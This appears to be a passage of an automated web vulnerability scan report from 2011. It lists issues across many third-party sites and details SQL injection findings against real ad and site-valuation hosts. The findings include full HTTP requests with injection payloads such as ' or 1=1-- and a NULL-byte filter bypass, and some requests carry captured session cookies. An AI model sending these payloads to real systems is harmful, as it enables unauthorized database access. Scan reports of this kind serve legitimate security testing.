33.10. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

33.11. http://pixel.invitemedia.com/data_sync

33.12. http://tags.bluekai.com/site/3945

33.13. http://tomopop.com/index-ad-anime.phtml

33.14. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

33.15. http://www.100grandinstantwin.com/favicon.ico

33.16. http://www.2hairy.com/favicon.ico

33.17. http://www.92kqrs.com/favicon.ico

33.18. http://www.ahima.org/favicon.ico

33.19. http://www.allsup.com/favicon.ico

33.20. http://www.amateurathome.net/favicon.ico

33.21. http://www.argosy.edu/favicon.ico

33.22. http://www.babynameshub.com/favicon.ico

33.23. http://www.benchmade.com/favicon.ico

33.24. http://www.bitstatement.net/favicon.ico

33.25. http://www.blackintrusion.com/favicon.ico

33.26. http://www.clipsguide.com/favicon.ico

33.27. http://www.coolquiz.com/favicon.ico

33.28. http://www.cramster.com/favicon.ico

33.29. http://www.crankyape.com/crankyape_logo.gif

33.30. http://www.cricbuzz.com/favicon.ico

33.31. http://www.cyberhomes.com/favicon.ico

33.32. http://www.dailynewnowa.com/favicon.ico

33.33. http://www.dermnet.com/favicon.ico

33.34. http://www.diskeeper.com/favicon.ico

33.35. http://www.earthfare.com/favicon.ico

33.36. http://www.easyearnsurveys.com/favicon.ico

33.37. http://www.expresstoll.com/favicon.ico

33.38. http://www.female-anatomy.net/favicon.ico

33.39. http://www.flashymodels.com/favicon.ico

33.40. http://www.forrabbits.eu/favicon.ico

33.41. http://www.freegroceriesdirectory.com/favicon.ico

33.42. http://www.giftcertificatedelivery.com/favicon.ico

33.43. http://www.govacuum.com/favicon.ico

33.44. http://www.gpwa.org/favicon.ico

33.45. http://www.hairyfilm.com/favicon.ico

33.46. http://www.hairygirlspussies.com/favicon.ico

33.47. http://www.hsj.org/favicon.ico

33.48. http://www.ibegin.com/weather/weather_widget.php

33.49. http://www.inmates-searches.com/favicon.ico

33.50. http://www.insites.eu/favicon.ico

33.51. http://www.japanator.com/elephant/index_cblogs-mini.phtml

33.52. http://www.japanator.com/elephant/login.phtml

33.53. http://www.japanator.com/elephant/signup.phtml

33.54. http://www.kieronwilliamson.com/favicon.ico

33.55. http://www.laptoptracking.net/favicon.ico

33.56. http://www.laterooms.com/favicon.ico

33.57. http://www.leagle.com/favicon.ico

33.58. http://www.lee.net/favicon.ico

33.59. http://www.mecum.com/favicon.ico

33.60. http://www.myfavoritegames.com/favicon.ico

33.61. http://www.mylearningplan.com/favicon.ico

33.62. http://www.myrtlebeach-resorts.com/favicon.ico

33.63. http://www.nfcc.org/favicon.ico

33.64. http://www.noonetube.com/favicon.ico

33.65. http://www.nylaarp.com/favicon.ico

33.66. http://www.onlinemicrofiche.com/

33.67. http://www.onlinemoneystash.com/favicon.ico

33.68. http://www.oshkosh365.org/favicon.ico

33.69. http://www.phonedelivery4g.com/favicon.ico

33.70. http://www.picindividuals.com/favicon.ico

33.71. http://www.recon.com/favicon.ico

33.72. http://www.redirectgame.com/favicon.ico

33.73. http://www.right-ads.com/favicon.ico

33.74. http://www.righttoworkfoundation.org/favicon.ico

33.75. http://www.ronniesmailorder.com/fiche_select1.asp

33.76. http://www.ronniesmailorder.com/testimonials_display.asp

33.77. http://www.rustoleum.com/favicon.ico

33.78. http://www.snapfinger.com/favicon.ico

33.79. http://www.str8boyzseduced.com/favicon.ico

33.80. http://www.tacklewarehouse.com/favicon.ico

33.81. http://www.techonlife.com/favicon.ico

33.82. http://www.tenniswarehouse.com/favicon.ico

33.83. http://www.termite.com/favicon.ico

33.84. http://www.tube555.com/favicon.ico

33.85. http://www.tubespecials.com/favicon.ico

33.86. http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm

33.87. http://www.weddings.com/favicon.ico

33.88. http://www.wheelfire.com/favicon.ico

33.89. http://www.womenolder.net/favicon.ico

33.90. http://www.wtuber.com/favicon.ico

33.91. http://www.wyeke.com/favicon.ico

33.92. http://www.yoplait.com/favicon.ico

34. HTML uses unrecognised charset

34.1. http://www.animeyoung.com/favicon.ico

34.2. http://www.mktginc.com/favicon.ico

34.3. http://www.swoopo.com/favicon.ico

34.4. http://www.washingtonpost.com/wl/jobs/home

35. Content type incorrectly stated

35.1. http://bdv.bidvertiser.com/BidVertiser.dbm

35.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

35.3. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848

35.4. http://csrc.nist.gov/favicon.ico

35.5. http://j.maxmind.com/app/geoip.js

35.6. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg

35.7. http://v6test.cdn.att.net/special.jpg

35.8. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

35.9. http://www.92kqrs.com/favicon.ico

35.10. http://www.ahima.org/favicon.ico

35.11. http://www.allsup.com/favicon.ico

35.12. http://www.babynameshub.com/favicon.ico

35.13. http://www.benchmade.com/favicon.ico

35.14. http://www.calastrology.com/favicon.ico

35.15. http://www.campingsurvival.com/favicon.ico

35.16. http://www.cramster.com/favicon.ico

35.17. http://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

35.18. https://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

35.19. https://www.crankyape.com/images/AuctionImages/thumb.26361.2.jpg

35.20. https://www.crankyape.com/images/AuctionImages/thumb.26361.3.jpg

35.21. https://www.crankyape.com/images/AuctionImages/thumb.26361.4.jpg

35.22. http://www.cyberhomes.com/favicon.ico

35.23. http://www.dermnet.com/favicon.ico

35.24. http://www.developer.com/favicon.ico

35.25. http://www.diskeeper.com/favicon.ico

35.26. http://www.earthfare.com/favicon.ico

35.27. http://www.fastpictureviewer.com/favicon.ico

35.28. http://www.freegroceriesdirectory.com/favicon.ico

35.29. http://www.goodtoknow.co.uk/favicon.ico

35.30. http://www.google.com/uds/Gfeeds

35.31. http://www.govacuum.com/favicon.ico

35.32. http://www.gpwa.org/favicon.ico

35.33. http://www.greenhulk.net/forums/customavatars/avatar21634_4.gif

35.34. http://www.greenhulk.net/forums/customavatars/avatar27186_2.gif

35.35. http://www.greenhulk.net/forums/customavatars/avatar3537_6.gif

35.36. http://www.greenhulk.net/forums/customavatars/avatar9792_2.gif

35.37. http://www.healthination.com/favicon.ico

35.38. http://www.highcharts.com/highslide/graphics/zoomout.cur

35.39. http://www.hsj.org/favicon.ico

35.40. http://www.ibegin.com/weather/weather_widget.php

35.41. http://www.inmates-searches.com/favicon.ico

35.42. http://www.insites.eu/favicon.ico

35.43. http://www.keds.com/favicon.ico

35.44. http://www.laterooms.com/favicon.ico

35.45. http://www.leagle.com/favicon.ico

35.46. http://www.mecum.com/favicon.ico

35.47. http://www.myfavoritegames.com/favicon.ico

35.48. http://www.newswiretoday.com/favicon.ico

35.49. http://www.nfcc.org/favicon.ico

35.50. http://www.nylaarp.com/favicon.ico

35.51. http://www.picindividuals.com/favicon.ico

35.52. http://www.recon.com/favicon.ico

35.53. http://www.redirectgame.com/favicon.ico

35.54. http://www.ronniesmailorder.com/fiche_select1.asp

35.55. http://www.ronniesmailorder.com/testimonials_display.asp

35.56. http://www.rustoleum.com/favicon.ico

35.57. http://www.seoq.com/favicon.ico

35.58. http://www.seoq.com/webstatshq/images/fav/a/l/b/505403_favicon.ico

35.59. http://www.seoq.com/webstatshq/images/fav/c/h/e/159320_favicon.ico

35.60. http://www.seoq.com/webstatshq/images/fav/def3.ico

35.61. http://www.seoq.com/webstatshq/images/fav/def5.ico

35.62. http://www.seoq.com/webstatshq/images/fav/def6.ico

35.63. http://www.seoq.com/webstatshq/images/fav/e/b/a/22_favicon.ico

35.64. http://www.seoq.com/webstatshq/images/fav/g/o/o/19_favicon.ico

35.65. http://www.seoq.com/webstatshq/images/fav/g/o/o/1_favicon.ico

35.66. http://www.seoq.com/webstatshq/images/fav/r/i/v/647810_favicon.ico

35.67. http://www.seoq.com/webstatshq/images/fav/s/p/e/648999_favicon.ico

35.68. http://www.seoq.com/webstatshq/images/fav/y/a/h/3_favicon.ico

35.69. http://www.snapfinger.com/favicon.ico

35.70. http://www.tacklewarehouse.com/favicon.ico

35.71. http://www.tenniswarehouse.com/favicon.ico

35.72. http://www.termite.com/favicon.ico

35.73. http://www.trafficspaces.net/favicon.ico

35.74. http://www.tubespecials.com/favicon.ico

35.75. http://www.wheelfire.com/favicon.ico

35.76. http://www.wyeke.com/favicon.ico

35.77. http://www.yoplait.com/favicon.ico

36. Content type is not specified

36.1. http://ad.yieldmanager.com/st

36.2. http://ads.bluelithium.com/st

36.3. http://pcm2.map.pulsemgr.com/uds/pc

36.4. http://www.bocajava.com/favicon.ico

36.5. http://www.lavalife.com/favicon.ico

36.6. http://www.ourprayer.org/favicon.ico

36.7. http://www.politicalissuestoday.com/favicon.ico

36.8. http://www.westjet.com/favicon.ico

37. SSL certificate

37.1. https://www.crankyape.com/

37.2. https://www.onlinemicrofiche.com/



1. SQL injection  next
There are 46 instances of this issue:


1.1. http://ads2.adbrite.com/v0/ad [zs parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /v0/ad?sid=1794248&zs=3330305f323530%00'&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:30 GMT
Content-Length: 0

Request 2

GET /v0/ad?sid=1794248&zs=3330305f323530%00''&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:31 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDYnbP6CRj42KrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EPiAyaMKGPjYqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:31 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:31 GMT
Set-Cookie: vsd=0@4@4dbe1567@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:31 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqlj%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:31 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:31 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:31 GMT
Content-Length: 2800

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...

1.2. http://bizinformation.co/www.onlinemicrofiche.com [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15684007'%20or%201%3d1--%20 and 15684007'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www.onlinemicrofiche.com15684007'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:12:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 545
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /www.onlinemicrofiche.com15684007' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

Request 2

GET /www.onlinemicrofiche.com15684007'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 541
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www.onlinemicrofiche.com15684007' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

1.3. http://bizinformation.co/www.onlinemicrofiche.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11607392%20or%201%3d1--%20 and 11607392%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www.onlinemicrofiche.com?111607392%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 526
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /www.onlinemicrofiche.com
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

Request 2

GET /www.onlinemicrofiche.com?111607392%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:11:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>www.Onlinemicrofiche.com</title><meta name="description" content="Onlinemicrofiche.com has a rank of 126,950 in United States, with an estimated 42,510 monthly visitors. Click to view further details of it's valuation report. Leave a comment or review the website." /><meta property="og:site_name" content="BizInformation"/><meta property="og:title" content="Onlinemicrofiche.com" /><meta property="og:image" content="http://open.thumbshots.org/image.pxf?url=onlinemicrofiche.com" /><link rel="icon" type="image" href="http://bizinformation.com/favicon.ico"/><link href="http://bizinformation.com/css/style_sp110.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="http://bizinformation.com/css/jquery.idTabs.min.js"></script></head><body><div class="main_wrapper"><div class="main_header"><div class="header_logo"><a href="/"><img src="http://bizinformation.com/images/logo.gif" /></a></div><div class="search_div_main"><div class="input_div"><form method="post" action="/" id="check"><input type="hidden" name="action" value="fetch_statistics" /><input type="text" name="url" id="url" value="www." class="url" /></div><input class="submit" type="submit" value="Value"/></form></div><div class="header_right_part"><div class="follow_us_on"><div class="follows_clickable_image"><img border="0" src="http://bizinformation.com/images/twitter-facebook.gif" /></div></div></div></div><div class="page_middle_part_border"><div class="page_middle_part"><div class="page_left
...[SNIP]...

1.4. http://bizinformation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 96146940'%20or%201%3d1--%20 and 96146940'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico96146940'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:16:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico96146940' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico96146940'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:16:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 529
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico96146940' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
